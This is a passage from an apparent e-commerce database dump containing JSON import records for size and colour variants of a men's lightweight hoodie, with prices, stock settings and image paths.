wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"194\":{\"sku\":\"MH13-XS-Lavender\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-XS-Lavender\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-xs-lavender\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Lavender\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Lavender\"},\"195\":{\"sku\":\"MH13-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-S-Blue\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"196\":{\"sku\":\"MH13-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-S-Green\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"197\":{\"sku\":\"MH13-S-Lavender\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-S-Lavender\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-s-lavender\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Lavender\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Lavender\"},\"198\":{\"sku\":\"MH13-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-M-Blue\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"199\":{\"sku\":\"MH13-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-M-Green\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(3, 'catalog_product', 'append', '{\"200\":{\"sku\":\"MH13-M-Lavender\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-M-Lavender\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-m-lavender\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Lavender\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Lavender\"},\"201\":{\"sku\":\"MH13-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-L-Blue\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\